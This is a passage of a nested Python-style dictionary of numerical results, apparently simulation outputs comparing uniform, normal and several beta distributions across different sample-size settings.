'beta1': 0.34752902436605043, 'beta2': 0.8230256289242237, 'beta4': 0.2700214004987484}, 300: {'uni': 0.3483072253851639, 'nor': 0.44993562666728104, 'beta1': 0.349268527034077, 'beta2': 0.6926501525691608, 'beta4': 0.2853686593826423}, 200: {'uni': 0.3470296256996466, 'nor': 0.4196297568242823, 'beta1': 0.34021112730517444, 'beta2': 0.562300202363076, 'beta4': 0.2998847086772037}, 150: {'uni': 0.3464761692956304, 'nor': 0.4042287728631724, 'beta1': 0.3452130359466471, 'beta2': 0.5089640450206934, 'beta4': 0.3081680855306012}, 100: {'uni': 0.35076633420093445, 'nor': 0.378135460048976, 'beta1': 0.3508849050425952, 'beta2': 0.45863169971558315, 'beta4': 0.31859381410486026}, 75: {'uni': 0.3436998033966782, 'nor': 0.3766331003411186, 'beta1': 0.3470801575318038, 'beta2': 0.4256019265347618, 'beta4': 0.33483905786401014}, 50: {'uni': 0.344343221396323, 'nor': 0.3561890060241063, 'beta1': 0.3445446190015034, 'beta2': 0.3984536383725175, 'beta4': 0.33210741741488403}, 30: {'uni': 0.34480539602579574, 'nor': 0.3574621127262308, 'beta1': 0.3463821171864507, 'beta2': 0.37860713383012484, 'beta4': 0.34241644586079795}, 20: {'uni': 0.3492479116908845, 'nor': 0.3468836182897213, 'beta1': 0.3470397303687519, 'beta2': 0.3771778056363512, 'beta4': 0.34309117628812213}, 10: {'uni': 0.34716489049413923, 'nor': 0.34726854629110016, 'beta1': 0.3419429175321523, 'beta2': 0.35692148413605357, 'beta4': 0.34471917186703666}}, 500: {1000: {'uni': 0.34980366649542444, 'nor': 0.8828084069791858, 'beta1': 0.34530404469333964, 'beta2': 2.0390420881992393, 'beta4': 0.21060713902409867}, 750: {'uni': 0.34562049614934987, 'nor': 0.7441575486111333, 'beta1': 0.3446423604936914, 'beta2': 1.5454359942202134, 'beta4': 0.2246312059363231}, 500: {'uni': 0.3499479954535063, 'nor': 0.6104516800045718, 'beta1': 0.34661641393000875, 'beta2': 1.115591239340158, 'beta4': 0.24370751974629912}, 400: {'uni': 0.34623159080404736, 'nor': 0.5643795655935262, 'beta1': 0.34395608282034135, 'beta2': 
0.9504329301967376, 'beta4': 0.250956210503198}, 300: {'uni': 0.3425969194301464, 'nor': 0.5049407623024504, 'beta1': 0.35235321689257676, 'beta2': 0.7939578647402028, 'beta4': 0.2683519210299116}, 200: {'uni': 0.3430607177495854, 'nor': 0.44879745877719035, 'beta1': 0.34501529777041695, 'beta2': 0.6292580338502747, 'beta4': 0.2855608768253181}, 150: {'uni': 0.34587642193397855, 'nor': 0.4204615533940365, 'beta1': 0.34164713670280794, 'beta2': 0.5737249925775849, 'beta4': 0.2971573193037079}, 100: {'uni': 0.34238445175117393, 'nor': 0.39388029037529504, 'beta1': 0.34902341792659347, 'beta2': 0.48221913721243437, 'beta4': 0.31469965931902977}, 75: {'uni': 0.3467116122075039, 'nor': 0.38817290389677783, 'beta1': 0.3517222324649411, 'beta2': 0.4486988314905505, 'beta4': 0.32065899569382833}, 50: {'uni': 0.3448974429488288, 'nor': 0.376999764119375, 'beta1': 0.34970045899172114, 'beta2': 0.4136016266145007, 'beta4': 0.3315402268547066}, 30: {'uni': 0.3450763942702253, 'nor': 0.359582406629779, 'beta1': 0.3475273188847172, 'beta2': 0.381992042961191, 'beta4': 0.3323036796222379}, 20: {'uni': 0.34867510464529977, 'nor': 0.35014087360264345, 'beta1': 0.34548306845712595, 'beta2': 0.3741498903455569, 'beta4': 0.33936857819735566}, 10: {'uni': 0.3389678071344472, 'nor': 0.3462171225002532, 'beta1': 0.3461858964125291, 'beta2': 0.35768688824311, 'beta4': 0.3454448002505371}}, 400: {1000: {'uni': 0.3412747607815299, 'nor': 1.0177178883630658, 'beta1': 0.3438242054634319, 'beta2': 1.9913254002158856, 'beta4': 0.20113561884912903}, 750: {'uni': 0.3490577726510959, 'nor': 0.8509827458513439, 'beta1': 0.34652921822246546, 'beta2': 1.5201078157253372, 'beta4': 0.211333303577262}, 500: {'uni': 0.34798773863259724, 'nor': 0.6755895166899817, 'beta1': 0.3473790211653727, 'beta2': 1.0987363289188878, 'beta4': 0.23196600902080236}, 400: {'uni': 0.3489527480495489, 'nor': 0.6044191427433583, 'beta1': 0.3467577402388518, 'beta2': 0.9335980474056014, 'beta4': 0.24488800695361335}, 300: 
{'uni': 0.3471155869537724, 'nor': 0.5508015092134401, 'beta1': 0.34424189925102483, 'beta2': 0.7935271208610247, 'beta4': 0.25747813877459824}, 200: {'uni': 0.3445568797042115, 'nor': 0.4675967309526432, 'beta1': 0.3500645313101199, 'beta2': 0.6739017550399186, 'beta4': 0.2743681532845661}, 150: {'uni': 0.35361449117436006, 'nor': 0.4511309221562023, 'beta1': 0.3462218569002684, 'beta2': 0.5791382939670757, 'beta4': 0.2887616378271954}, 100: {'uni': 0.34500319374883415, 'nor': 0.41178634546653503, 'beta1': 0.34728954575526966, 'beta2': 0.5011804138006778, 'beta4': 0.3034732161183125}, 75: {'uni': 0.34557108489320804, 'nor': 0.3989063728632237, 'beta1': 0.3470788068835562, 'beta2': 0.4569511082377164, 'beta4': 0.3171266416110887}, 50: {'uni': 0.3469017207004219, 'nor': 0.38520506727358106, 'beta1': 0.34612160245120194, 'beta2': 0.41185340415894384, 'beta4': 0.32620775126216733}, 30: {'uni': 0.34632131112233244, 'nor': 0.36585499457591303, 'beta1': 0.3444607742924859, 'beta2': 0.3889474502225472, 'beta4': 0.3336066143492354}, 20: {'uni': 0.3502013005709345, 'nor': 0.36446150318855836, 'beta1': 0.3479197101489542, 'beta2': 0.3737133387595116, 'beta4': 0.3364565889405686}, 10: {'uni': 0.34007066527671714, 'nor': 0.349271960957368, 'beta1': 0.33995922081352276, 'beta2': 0.36095135551696184, 'beta4': 0.3422350611007681}}, 300: {1000: {'uni': 0.34780248511164635, 'nor': 1.2459233986726455, 'beta1': 0.34744144501755014, 'beta2': 2.2084838579165464, 'beta4': 0.189081472987699}, 750: {'uni': 0.34654011205832125, 'nor': 1.006322838980424, 'beta1': 0.34742183633042256, 'beta2': 1.7091687862980112, 'beta4': 0.1986938433930994}, 500: {'uni': 0.3456791171060871, 'nor': 0.7751979278397534, 'beta1': 0.3440113776197222, 'beta2': 1.2092320961421312, 'beta4': 0.217132298417705}, 400: {'uni': 0.3489269333627507, 'nor': 0.7044423515166887, 'beta1': 0.34411795808308093, 'beta2': 1.0310653608432898, 'beta4': 0.23030128761412128}, 300: {'uni': 0.34837799124822233, 'nor': 
0.606506473158486, 'beta1': 0.3492891192903364, 'beta2': 0.9333450580111946, 'beta4': 0.2408361375200047}, 200: {'uni': 0.34730139025972234, 'nor': 0.5272296871475277, 'beta1': 0.33971683925089174, 'beta2': 0.7361677221850133, 'beta4': 0.2637544743748866}, 150: {'uni': 0.34760670816432354, 'nor': 0.481145213232932, 'beta1': 0.3467693322076453, 'beta2': 0.6173032899166593, 'beta4': 0.2750328241811572}, 100: {'uni': 0.3480710820539448, 'nor': 0.4373869135130795, 'beta1': 0.34733880445619963, 'beta2': 0.5217846583202729, 'beta4': 0.29138608643267194}, 75: {'uni': 0.344012344807911, 'nor': 0.4023970962232527, 'beta1': 0.3495418301470877, 'beta2': 0.48385297839039, 'beta4': 0.30746632172742533}, 50: {'uni': 0.3456741024510142, 'nor': 0.387583403531333, 'beta1': 0.3450764110863124, 'beta2': 0.42792581205635305, 'beta4': 0.31493852332853506}, 30: {'uni': 0.34757461968534475, 'nor': 0.3660480324362303, 'beta1': 0.3430535156174783, 'beta2': 0.39516737178821565, 'beta4': 0.3266792953043453}, 20: {'uni': 0.34332496479157215, 'nor': 0.37016864522498233, 'beta1': 0.3438921835770231, 'beta2': 0.3780257022382943, 'beta4': 0.332826430774212}, 10: {'uni': 0.3432638175430853, 'nor': 0.34656732461796685, 'beta1': 0.34530041961548025, 'beta2': 0.3621336740217708, 'beta4': 0.33301573335144213}}, 200: {1000: {'uni': 0.35397577006236064, 'nor': 1.6880107688499668, 'beta1': 0.3509512766017229, 'beta2': 2.5472310916904464, 'beta4': 0.17937070455079063}, 750: {'uni': 0.3534492950521917, 'nor': 1.3462174364691601, 'beta1': 0.34252933428118637, 'beta2': 1.9997138016373859, 'beta4': 0.18808720501818546}, 500: {'uni': 0.3414087298618831, 'nor': 1.003233841927636, 'beta1': 0.3453809732427485, 'beta2': 1.4542100041390176, 'beta4': 0.2028182073608281}, 400: {'uni': 0.3458951879188956, 'nor': 0.8685866682805892, 'beta1': 0.34743230253372726, 'beta2': 1.332099610483853, 'beta4': 0.20908071122056882}, 300: {'uni': 0.3471664547886561, 'nor': 0.727794381484671, 'beta1': 0.35076929096112525, 'beta2': 
1.0434269108804657, 'beta4': 0.22423365788256022}, 200: {'uni': 0.34413238821258607, 'nor': 0.6147359660914746, 'beta1': 0.35089981074426324, 'beta2': 0.8099260333831554, 'beta4': 0.24358797686705402}, 150: {'uni': 0.339936102320085, 'nor': 0.55221617457234, 'beta1': 0.34616688013398644, 'beta2': 0.7051079677507086, 'beta4': 0.2505100139108426}, 100: {'uni': 0.3446261265431087, 'nor': 0.4792836523502122, 'beta1': 0.35142451365868926, 'beta2': 0.5858619038731584, 'beta4': 0.2751043217476785}, 75: {'uni': 0.3478642666164821, 'nor': 0.45888115676348, 'beta1': 0.3486583947927791, 'beta2': 0.5164284462675127, 'beta4': 0.28845638479831875}, 50: {'uni': 0.34103513391692986, 'nor': 0.41208649872391234, 'beta1': 0.344884394694451, 'beta2': 0.45971215774307156, 'beta4': 0.29938022874279796}, 30: {'uni': 0.3481030712621901, 'nor': 0.3894583006944668, 'beta1': 0.34717964633738396, 'beta2': 0.4096578744766348, 'beta4': 0.3197560171684093}, 20: {'uni': 0.33983037641029334, 'nor': 0.37505954789145096, 'beta1': 0.3487484160639571, 'beta2': 0.38550515120020684, 'beta4': 0.32511678116663717}, 10: {'uni': 0.34648485570776455, 'nor': 0.36054087791292677, 'beta1': 0.3457880198406115, 'beta2': 0.36093745693627277, 'beta4': 0.33750493584405156}}, 150: {1000: {'uni': 0.35855679355645487, 'nor': 2.137814211516231, 'beta1': 0.3505282691209241, 'beta2': 2.9019884065488495, 'beta4': 0.17157691794475752}, 750: {'uni': 0.3520800612264919, 'nor': 1.7021693510463247, 'beta1': 0.3511398978439243, 'beta2': 2.269796020841365, 'beta4': 0.17947834909802796}, 500: {'uni': 0.35011570165384504, 'nor': 1.2462148272826032, 'beta1': 0.34610681903199625, 'beta2': 1.7552755586485762, 'beta4': 0.19119731999075687}, 400: {'uni': 0.3456329512316953, 'nor': 1.0590359965214562, 'beta1': 0.35014065898105695, 'beta2': 1.4313410427332007, 'beta4': 0.19623036838033153}, 300: {'uni': 0.34527118758550485, 'nor': 0.8812749025718438, 'beta1': 0.34944394458697825, 'beta2': 1.1588075057993832, 'beta4': 0.20771969576432014}, 
200: {'uni': 0.3489738989982756, 'nor': 0.7014599135166738, 'beta1': 0.34830333644666117, 'beta2': 0.915340546836583, 'beta4': 0.2263531728160868}, 150: {'uni': 0.3429228048276349, 'nor': 0.6165824034990142, 'beta1': 0.34343683973228967, 'beta2': 0.7566890470098447, 'beta4': 0.24382109386295112}, 100: {'uni': 0.3425285186465402, 'nor': 0.5317499572943216, 'beta1': 0.3454943851918104, 'beta2': 0.6240602607130921, 'beta4': 0.26276196224188025}, 75: {'uni': 0.3473550254909798, 'nor': 0.4781796971737509, 'beta1': 0.3493724223269961, 'beta2': 0.5591888563697984, 'beta4': 0.27778273801276504}, 50: {'uni': 0.3428279297727261, 'nor': 0.43535250166487094, 'beta1': 0.3442214225564261, 'beta2': 0.479908838662072, 'beta4': 0.2937106328128505}, 30: {'uni': 0.3418794080578704, 'nor': 0.40103316462979616, 'beta1': 0.3499534241478493, 'beta2': 0.4227810467699822, 'beta4': 0.3102985640146892}, 20: {'uni': 0.34811502141065576, 'nor': 0.38549582915429814, 'beta1': 0.3441463547925956, 'beta2': 0.39277202188140015, 'beta4': 0.3187336459718889}, 10: {'uni': 0.34330862403529744, 'nor': 0.36346435616006495, 'beta1': 0.3469201841472034, 'beta2': 0.3581487076523773, 'beta4': 0.3327277447628047}}, 100: {1000: {'uni': 0.3722831918742666, 'nor': 3.0381615766629624, 'beta1': 0.3487812436005163, 'beta2': 3.4056411541631597, 'beta4': 0.16687909663377307}, 750: {'uni': 0.36086762860351934, 'nor': 2.3794615987237338, 'beta1': 0.351189585306215, 'beta2': 2.5949293863952536, 'beta4': 0.1709871528017898}, 500: {'uni': 0.349805023733788, 'nor': 1.7056246948939178, 'beta1': 0.3475762510915695, 'beta2': 1.9018134806788765, 'beta4': 0.17969632659255938}, 400: {'uni': 0.3490677824745589, 'nor': 1.3999121462123332, 'beta1': 0.3507443961701372, 'beta2': 1.6095123649369334, 'beta4': 0.18579332318138084}, 300: {'uni': 0.34879085377563823, 'nor': 1.1658197529948917, 'beta1': 0.34774454661138066, 'beta2': 1.3183855664195328, 'beta4': 0.19580380328549032}, 200: {'uni': 0.34331340368316626, 'nor': 
0.8793367098901197, 'beta1': 0.3449855343207457, 'beta2': 1.0296524804053566, 'beta4': 0.21178290032007802}, 150: {'uni': 0.34134065052350926, 'nor': 0.7550776311919849, 'beta1': 0.3438476193999038, 'beta2': 0.8356367089354535, 'beta4': 0.2243814426924324}, 100: {'uni': 0.34494961517463724, 'nor': 0.6074739448155042, 'beta1': 0.350538922675542, 'beta2': 0.6833257829663539, 'beta4': 0.2435075875469618}, 75: {'uni': 0.34823909271266096, 'nor': 0.5506586574743351, 'beta1': 0.3450886289873298, 'beta2': 0.5985491404272344, 'beta4': 0.2562367198191135}, 50: {'uni': 0.3445907688697594, 'nor': 0.4892029171428822, 'beta1': 0.351685420248068, 'beta2': 0.50463513631763, 'beta4': 0.2721121885598124}, 30: {'uni': 0.34380387455691164, 'nor': 0.42482766423752505, 'beta1': 0.3517093374868383, 'beta2': 0.433137251893754, 'beta4': 0.29889400163605306}, 20: {'uni': 0.34761787684419804, 'nor': 0.40063690078106884, 'beta1': 0.34569487097161505, 'beta2': 0.4043324689835272, 'beta4': 0.3099384406707861}, 10: {'uni': 0.3368231032278602, 'nor': 0.37414139322084167, 'beta1': 0.34526172651145914, 'beta2': 0.3768152424104807, 'beta4': 0.3258793776432392}}, 75: {1000: {'uni': 0.38032079371458866, 'nor': 3.893179411720956, 'beta1': 0.33895197976916025, 'beta2': 3.665817783885145, 'beta4': 0.16221681570587448}, 750: {'uni': 0.3774896680042954, 'nor': 3.041307612796793, 'beta1': 0.3531047623969306, 'beta2': 2.9177298137115932, 'beta4': 0.16760701259293861}, 500: {'uni': 0.3691603809627662, 'nor': 2.1136522720926076, 'beta1': 0.3506731318868911, 'beta2': 2.0800219389279033, 'beta4': 0.17237248115050258}, 400: {'uni': 0.3542804938614184, 'nor': 1.7635783367478515, 'beta1': 0.3480209110363151, 'beta2': 1.753279431906443, 'beta4': 0.17877015455578205}, 300: {'uni': 0.3530910129911514, 'nor': 1.40824257505653, 'beta1': 0.3468992232652649, 'beta2': 1.4286138146048428, 'beta4': 0.18618258284509892}, 200: {'uni': 0.35404448422917234, 'nor': 1.0871523518236694, 'beta1': 0.34676310798083787, 'beta2': 
1.0969581653639313, 'beta4': 0.19917988881180035}, 150: {'uni': 0.3471357147047061, 'nor': 0.8860821820154345, 'beta1': 0.34219905448064564, 'beta2': 0.9223710573153442, 'beta4': 0.21007320251501296}, 100: {'uni': 0.3473811058881694, 'nor': 0.715183149921106, 'beta1': 0.34386435910210156, 'beta2': 0.7290266843292309, 'beta4': 0.2302230863314267}, 75: {'uni': 0.34480847684480825, 'nor': 0.6128517103087979, 'beta1': 0.3490544903490166, 'beta2': 0.6210256341169503, 'beta4': 0.23928023154694925}, 50: {'uni': 0.3519634286283122, 'nor': 0.535269531408463, 'beta1': 0.3485012701192417, 'beta2': 0.529307351668824, 'beta4': 0.26177269899069644}, 30: {'uni': 0.34761067896637265, 'nor': 0.460593353930858, 'beta1': 0.3460459195016941, 'beta2': 0.4519827169452344, 'beta4': 0.289949655149545}, 20: {'uni': 0.3468412967012832, 'nor': 0.42130771837669, 'beta1': 0.34702385398283925, 'beta2': 0.42403711754723916, 'beta4': 0.3001880754924463}, 10: {'uni': 0.3395056585563256, 'nor': 0.38398628388024797, 'beta1': 0.34266048288383505, 'beta2': 0.37609257537094914, 'beta4': 0.32389503113475765}}, 50: {1000: {'uni': 0.4347386296621316, 'nor': 5.903113283717573, 'beta1': 0.3458499082519396, 'beta2': 4.56059131081475, 'beta4': 0.16177924865526983}, 750: {'uni': 0.4080484429773817, 'nor': 4.462441182886646, 'beta1': 0.3448072378752806, 'beta2': 3.627354125296263, 'beta4': 0.16521179391821397}, 500: {'uni': 0.3852363552796836, 'nor': 3.0766708652850117, 'beta1': 0.3474481187838615, 'beta2': 2.544804667262524, 'beta4': 0.16604306303156843}, 400: {'uni': 0.38227668686292127, 'nor': 2.548974709246717, 'beta1': 0.3564344226224531, 'beta2': 2.1034143877988716, 'beta4': 0.16997498457387009}, 300: {'uni': 0.36482493041269376, 'nor': 1.9887184654132837, 'beta1': 0.34800510793556466, 'beta2': 1.6526246501307664, 'beta4': 0.17253160277881177}, 200: {'uni': 0.36337018580466046, 'nor': 1.4457332170143293, 'beta1': 0.3510141513992577, 'beta2': 1.2763395931108832, 'beta4': 0.18462120515319508}, 150: {'uni': 
0.35577904314930736, 'nor': 1.1558700394945114, 'beta1': 0.34949146441961493, 'beta2': 1.0592480702192182, 'beta4': 0.19561796749180563}, 100: {'uni': 0.3477172098075887, 'nor': 0.9073729769528663, 'beta1': 0.3450185824743941, 'beta2': 0.8094515457094794, 'beta4': 0.2071546414569944}, 75: {'uni': 0.34125034122921394, 'nor': 0.7547201637839731, 'beta1': 0.3456874754796907, 'beta2': 0.7017239279026216, 'beta4': 0.21922659978150177}, 50: {'uni': 0.33880945045029826, 'nor': 0.6079205186753285, 'beta1': 0.3543737005717827, 'beta2': 0.5816117115186251, 'beta4': 0.24353668852069424}, 30: {'uni': 0.3431007994484497, 'nor': 0.515581573279696, 'beta1': 0.346492905581158, 'beta2': 0.4727465341515703, 'beta4': 0.2707420287422262}, 20: {'uni': 0.33540476537955854, 'nor': 0.45520516780061937, 'beta1': 0.3406042857634804, 'beta2': 0.42569063054856937, 'beta4': 0.2864332225489485}, 10: {'uni': 0.34219260815428754, 'nor': 0.4030004368028241, 'beta1': 0.3424555787270816, 'beta2': 0.3895108454898639, 'beta4': 0.3134271440491817}}, 30: {1000: {'uni': 0.5912672207776604, 'nor': 9.527258371560922, 'beta1': 0.36358902818996824, 'beta2': 6.0474393748944255, 'beta4': 0.1566183550644414}, 750: {'uni': 0.5205276415999436, 'nor': 7.1846290287913535, 'beta1': 0.36042655724639866, 'beta2': 4.721207847858767, 'beta4': 0.15817695286915404}, 500: {'uni': 0.458945074914611, 'nor': 4.9438685876332675, 'beta1': 0.3512022799112701, 'beta2': 3.277870745954269, 'beta4': 0.16010949046042697}, 400: {'uni': 0.4392171770850031, 'nor': 4.040052462527793, 'beta1': 0.34937995162981234, 'beta2': 2.685259178691964, 'beta4': 0.16469616287949998}, 300: {'uni': 0.4042998393631235, 'nor': 3.1228108633451424, 'beta1': 0.35391590930846445, 'beta2': 2.0726334265315987, 'beta4': 0.16673640336372708}, 200: {'uni': 0.387238644411021, 'nor': 2.1704115878479118, 'beta1': 0.34614994776463975, 'beta2': 1.5341779941768152, 'beta4': 0.17262425762789227}, 150: {'uni': 0.3718021016553037, 'nor': 1.6935285337198958, 'beta1': 
0.345108376430461, 'beta2': 1.2073441904012723, 'beta4': 0.1762258439064716}, 100: {'uni': 0.3584866807874342, 'nor': 1.2538009391466625, 'beta1': 0.3450931333761505, 'beta2': 0.9488607884476075, 'beta4': 0.18927407539036956}, 75: {'uni': 0.35116467381518124, 'nor': 1.0239932402161527, 'beta1': 0.3464071359362087, 'beta2': 0.8024377076076704, 'beta4': 0.20216287361165863}, 50: {'uni': 0.34245713359424695, 'nor': 0.811421429036936, 'beta1': 0.3488815710989564, 'beta2': 0.638751193692387, 'beta4': 0.2176599981779147}, 30: {'uni': 0.34903831332483576, 'nor': 0.6147648924540778, 'beta1': 0.3440196877298809, 'beta2': 0.515506440973083, 'beta4': 0.24016190092594067}, 20: {'uni': 0.33737476805183686, 'nor': 0.5309803958803571, 'beta1': 0.34097608432305376, 'beta2': 0.4582370367023497, 'beta4': 0.26284911332188543}, 10: {'uni': 0.33781041301044673, 'nor': 0.4419972892631432, 'beta1': 0.34437991388723727, 'beta2': 0.3942969069743231, 'beta4': 0.2865988298916934}}, 20: {1000: {'uni': 0.8965909515980386, 'nor': 14.43160261621047, 'beta1': 0.40879724910349813, 'beta2': 7.703097044523489, 'beta4': 0.15777136298750422}, 750: {'uni': 0.7465181212742386, 'nor': 10.80135778166109, 'beta1': 0.38921094677035356, 'beta2': 5.9974942469122325, 'beta4': 0.15998239385661403}, 500: {'uni': 0.6088672984749545, 'nor': 7.304689028033914, 'beta1': 0.373771541626272, 'beta2': 4.027137560010544, 'beta4': 0.16163415741805556}, 400: {'uni': 0.5512936057820512, 'nor': 5.956240612141846, 'beta1': 0.3697285679426312, 'beta2': 3.335922157039538, 'beta4': 0.1611260117755855}, 300: {'uni': 0.49676954291719955, 'nor': 4.58931566065136, 'beta1': 0.35950999134779804, 'beta2': 2.583167677932982, 'beta4': 0.1622195846063796}, 200: {'uni': 0.43568253433790133, 'nor': 3.1173720871603443, 'beta1': 0.3464265148706499, 'beta2': 1.8079860961396275, 'beta4': 0.16758797337107686}, 150: {'uni': 0.4046165586714504, 'nor': 2.4195703053430293, 'beta1': 0.3531443387784461, 'beta2': 1.4753331116985116, 'beta4': 
0.16965491542778036}, 100: {'uni': 0.3762742643740686, 'nor': 1.765288822689759, 'beta1': 0.3524276940513375, 'beta2': 1.0841173374160238, 'beta4': 0.17845587683466202}, 75: {'uni': 0.36218638835697453, 'nor': 1.3876888573033577, 'beta1': 0.3503939829222516, 'beta2': 0.8954861247858222, 'beta4': 0.1877690214122453}, 50: {'uni': 0.3521418775849935, 'nor': 1.0414912127014189, 'beta1': 0.34022528133363233, 'beta2': 0.7054403223889628, 'beta4': 0.20028939322658593}, 30: {'uni': 0.3426909931385447, 'nor': 0.7675040513769444, 'beta1': 0.34053541174088253, 'beta2': 0.5503420280923643, 'beta4': 0.2215057999895056}, 20: {'uni': 0.3363305461705004, 'nor': 0.6255214087625113, 'beta1': 0.33491632393555937, 'beta2': 0.46832505580377143, 'beta4': 0.24284505128556536}, 10: {'uni': 0.33518761864677465, 'nor': 0.4931184293561005, 'beta1': 0.3391485976534156, 'beta2': 0.39630521127982427, 'beta4': 0.27139530895291425}}, 10: {1000: {'uni': 2.3874340797968814, 'nor': 29.663480850360397, 'beta1': 0.9169229003489705, 'beta2': 12.20925559858758, 'beta4': 0.1564888636547848}, 750: {'uni': 1.8615157681014205, 'nor': 21.801968499676818, 'beta1': 0.7473940671291324, 'beta2': 9.267094002909307, 'beta4': 0.1561349717825088}, 500: {'uni': 1.3134854154935922, 'nor': 15.249137564401448, 'beta1': 0.5934628187469416, 'beta2': 6.175670299414178, 'beta4': 0.1576162013654804}, 400: {'uni': 1.1145075409375296, 'nor': 11.974411479422269, 'beta1': 0.5301830934992371, 'beta2': 5.140934047559648, 'beta4': 0.15897679114618293}, 300: {'uni': 0.9078215986658665, 'nor': 8.868858736093818, 'beta1': 0.4850422676075548, 'beta2': 3.8520697501497536, 'beta4': 0.15601309502687813}, 200: {'uni': 0.7081080566694192, 'nor': 6.227802150964231, 'beta1': 0.4280233051488676, 'beta2': 2.6977738374144065, 'beta4': 0.16111656347952902}, 150: {'uni': 0.6007454684465097, 'nor': 4.710059470113114, 'beta1': 0.3990084689677828, 'beta2': 2.0564056256518675, 'beta4': 0.1627500664646643}, 100: {'uni': 0.49761742864535224, 'nor': 
3.250988568599194, 'beta1': 0.3737337332326855, 'beta2': 1.4561033940469712, 'beta4': 0.1665861437159576}, 75: {'uni': 0.4503391470649682, 'nor': 2.5306944092179675, 'beta1': 0.36124674699535686, 'beta2': 1.1922233929028405, 'beta4': 0.16676211842199312}, 50: {'uni': 0.40116564754189815, 'nor': 1.8282171177299855, 'beta1': 0.35304130396901157, 'beta2': 0.8794730305256969, 'beta4': 0.17737449940003902}, 30: {'uni': 0.35980970739758494, 'nor': 1.222640887186312, 'beta1': 0.3400081965549426, 'beta2': 0.6511660921260646, 'beta4': 0.18895070743803286}, 20: {'uni': 0.34682134148512966, 'nor': 0.9477562627590225, 'beta1': 0.33450338225464055, 'beta2': 0.538055747077308, 'beta4': 0.2062208052648477}, 10: {'uni': 0.3311807215098405, 'nor': 0.6394074548870496, 'beta1': 0.3301935234529011, 'beta2': 0.41808098738012345, 'beta4': 0.239050783112545}}}, 0.2: {1000: {1000: {'uni': 0.24124725799461827, 'nor': 0.4053264452318229, 'beta1': 0.23914293982059717, 'beta2': 1.0509959984580306, 'beta4': 0.17568080256625232}, 750: {'uni': 0.24164388268120782, 'nor': 0.3687830499658719, 'beta1': 0.243028138607501, 'beta2': 0.784731460864333, 'beta4': 0.18815121077723373}, 500: {'uni': 0.24326842966163004, 'nor': 0.32463820180526554, 'beta1': 0.24310356844769024, 'beta2': 0.560609377317712, 'beta4': 0.19960017726532056}, 400: {'uni': 0.23902795484816924, 'nor': 0.3125538120607967, 'beta1': 0.24223057995297714, 'beta2': 0.4770053150772008, 'beta4': 0.20309690339198788}, 300: {'uni': 0.23869851303079107, 'nor': 0.2917904746847079, 'beta1': 0.23805489672369276, 'beta2': 0.4061962989224635, 'beta4': 0.21148616699287323}, 200: {'uni': 0.24368185962341393, 'nor': 0.279239353863688, 'beta1': 0.24329991362449854, 'beta2': 0.3464015419031672, 'beta4': 0.21701422300653347}, 150: {'uni': 0.23805417073622206, 'nor': 0.2648108143069742, 'beta1': 0.24112587613874334, 'beta2': 0.3169793434410238, 'beta4': 0.22625899182567927}, 100: {'uni': 0.24112468954747324, 'nor': 0.2555534679342511, 'beta1': 
0.24391216254475265, 'beta2': 0.2811465587345888, 'beta4': 0.22615912967234958}, 75: {'uni': 0.2377789796740822, 'nor': 0.2502177301730839, 'beta1': 0.23897299843042535, 'beta2': 0.27291284924753667, 'beta4': 0.23102167971177617}, 50: {'uni': 0.2420481229386659, 'nor': 0.2483541709202484, 'beta1': 0.2395019750658544, 'beta2': 0.26178626368274266, 'beta4': 0.2378697343455223}, 30: {'uni': 0.23839523280714542, 'nor': 0.2448261144336522, 'beta1': 0.24297869273136183, 'beta2': 0.2549842966602735, 'beta4': 0.2344566138825933}, 20: {'uni': 0.24294085836130722, 'nor': 0.2459984385174377, 'beta1': 0.2409977912230283, 'beta2': 0.24836430873811524, 'beta4': 0.24236541724974348}, 10: {'uni': 0.23996750948003354, 'nor': 0.24319752879898954, 'beta1': 0.24061748766076452, 'beta2': 0.24848114887420777, 'beta4': 0.23742872285699368}}, 750: {1000: {'uni': 0.24213602459464384, 'nor': 0.4668947186186115, 'beta1': 0.2400298002859102, 'beta2': 1.0537929179775296, 'beta4': 0.16960490699279673}, 750: {'uni': 0.24252558303608956, 'nor': 0.40252237715680944, 'beta1': 0.24007629950163753, 'beta2': 0.7880701340760959, 'beta4': 0.17806957712390817}, 500: {'uni': 0.24364703012383299, 'nor': 0.34998153650454966, 'beta1': 0.24139971779624214, 'beta2': 0.5617828287616604, 'beta4': 0.1912425902387635}, 400: {'uni': 0.24147766494729744, 'nor': 0.33073040328340325, 'beta1': 0.23886051231633573, 'beta2': 0.4821271764245669, 'beta4': 0.19650526443681385}, 300: {'uni': 0.24537594610132082, 'nor': 0.30608768980075746, 'beta1': 0.23858930631150674, 'beta2': 0.41147281542567865, 'beta4': 0.20502061090216653}, 200: {'uni': 0.24268617663557088, 'nor': 0.2891942420581909, 'beta1': 0.24104096550685916, 'beta2': 0.3549441465252581, 'beta4': 0.21514022394369312}, 150: {'uni': 0.24034254831699772, 'nor': 0.2725893818027367, 'beta1': 0.23968652814412453, 'beta2': 0.32196628110834, 'beta4': 0.22158539656940412}, 100: {'uni': 0.24066960454670216, 'nor': 0.26072438431981576, 'beta1': 0.23860999283751405, 'beta2': 
0.295308268894434, 'beta4': 0.22468320403577302}, 75: {'uni': 0.2372348854433789, 'nor': 0.2577253003131136, 'beta1': 0.23904507681739837, 'beta2': 0.2808413650663696, 'beta4': 0.22998494050062063}, 50: {'uni': 0.24162659968427913, 'nor': 0.25234746676918207, 'beta1': 0.24423303357816123, 'beta2': 0.26517888856634686, 'beta4': 0.23259076555479863}, 30: {'uni': 0.24026106701043032, 'nor': 0.24910214073724177, 'beta1': 0.2405253750459323, 'beta2': 0.2551649499009466, 'beta4': 0.2365634356538571}, 20: {'uni': 0.24267815059641026, 'nor': 0.245298372253819, 'beta1': 0.24080870936687, 'beta2': 0.2552267059461294, 'beta4': 0.24100356768933173}, 10: {'uni': 0.24456210577096196, 'nor': 0.24477627325344592, 'beta1': 0.24555026833090088, 'beta2': 0.242950667829395, 'beta4': 0.24155735139737788}}, 500: {1000: {'uni': 0.24164987087115197, 'nor': 0.5721918782884466, 'beta1': 0.23996298637023378, 'beta2': 1.1779948690165256, 'beta4': 0.15428354475510184}, 750: {'uni': 0.24159673038840507, 'nor': 0.4918971663930825, 'beta1': 0.24120994313020436, 'beta2': 0.8803516369213815, 'beta4': 0.16565776898213674}, 500: {'uni': 0.23991550021580707, 'nor': 0.4101489076635629, 'beta1': 0.23929053512796192, 'beta2': 0.6491947662249905, 'beta4': 0.17883673195668998}, 400: {'uni': 0.24251723206941572, 'nor': 0.36960634216527005, 'beta1': 0.24277119423256865, 'beta2': 0.5505149369922498, 'beta4': 0.18419162201388328}, 300: {'uni': 0.24179003293271845, 'nor': 0.33510396603618053, 'beta1': 